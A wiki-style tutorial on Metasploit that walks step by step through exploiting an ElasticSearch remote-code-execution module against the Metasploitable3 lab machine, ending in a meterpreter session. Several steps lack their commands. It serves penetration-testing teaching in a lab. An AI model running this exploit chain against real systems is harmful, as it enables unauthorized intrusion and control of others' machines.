Metasploit Framework MSF
- 1 Summary
- 2 Requirements
- 3 Description of exploit
- 4 Used Hardware
- 5 References
Metasploit Framework MSF is a tool to detect security vulnerabilities in a IT network infrastructure, it is called Penetration Testing. Penetration Testing is often referred to as "Ethical Hacking". The aim of the penetration tester is to analyse a specific target or a whole network domain.This tool is providing a Application Programming Interface API for security developers to modify or create new vulnerability modules within the framework.
A penetration test is occuring in several stages to get the best pentest results. Firstly, it is necessary to specify the requirements together with your customer. That means, to define the devies at the target domain you would like to attack. After this stage, it is necessary to perform Information or Intelligence Gathering to get enough important details from the target to detect an unprotected breach. When one or more breaches are detected, the penetration tester is spying out how to gain access to the systems. Finally, the exploit of the systems can be performed, if the method of gaining access to it is determined. If the access is gained, Post-Exploitation is necessary to gather important data in the critical network domain.
- Operating system: Linux, f.e. Kali Linux or Ubuntu 18.04
- Packages: msfconsole postgresql git nmap virtualbox
In order to complete these steps, you must have followed Metasploit Framework, Metasploitable3, PostgreSQL or MySQL Installation Documentation before.
Description of exploit
This is a short Step by Step guidance to run an exploit against a Windows Server 2008 in a virtual machine. Therefore we chose the Application ElasticSearch prior to Version 1.2.0, which is already installed in the Metasploitable3 virtual machine from Rapid7.
The module multi/elasticsearch/script_mvel_rce exploits a Remote Command Execution (RCE) vulnerability in ElasticSearch. The REST API allows dynamic scripts execution without authentication. The remote attacker is able to execute arbitrary Java Code on the target system.
Step 1: open msf tool
Enter the command in the shell to open the terminal of the framework:
Step 2: nmap scan
Enter the command in the shell to detect the open ports of your virtual machine:
db_nmap -Pn 172.28.128.3
This command will save the scan directly to the database, you have configured. Enter the command in the shell to check the save results:
Step 3: search module
Enter the command in the shell to search for a exploit module, named elastic:
Step 4: use module
Enter the command in the shell to use a exploit module:
Enter the command in the shell to check the usage of the module:
Step 5: show module options
Enter the command in the shell to show the module options:
Step 6: set module options
Enter the command in the shell to set the options:
set rhosts 172.28.128.3
set verbose true
set lhost 172.28.128.1
set rport 9200
Check your settings again with command:
Step 7: vulnerability and exploit
Enter the command in the shell to check the vulnerability of the system:
Enter the command in the shell to exploit:
The connection to the meterpreter should be opened to perform post-exploitation. If this is not working, maybe check your firewall configurations.
Step 8: meterpreter shell
Enter the command in the shell to open the Command Line Interface CLI of the target host:
Enter the command in the shell to check the placement of the xxx.jar file:
DIR /s C:\WINDOWS\TEMP\xxx.jar
- Elasticsearch dynamic script arbitrary java execution. https://www.rapid7.com/db/modules/exploit/multi/elasticsearch/script_mvel_rce
- Kali linux by offensive security. https://kali.org/
- David Kennedy. Metasploit: the penetration testers guide. No Starch Press, San Francisco, CA, 2011.
- David Maynor and K. K.. Mookhey. Metasploit toolkit for penetration testing, exploit development, and vulnerability research. Syngress, Burlington (Mass), 2007.
- Metasploit framework. https://wiki.archlinux.org/index.php/Metasploit_Framework
- Metasploit unleashed. https://www.offensive-security.com/
- Metasploit framework. https://metasploit.help.rapid7.com/docs/msf-overview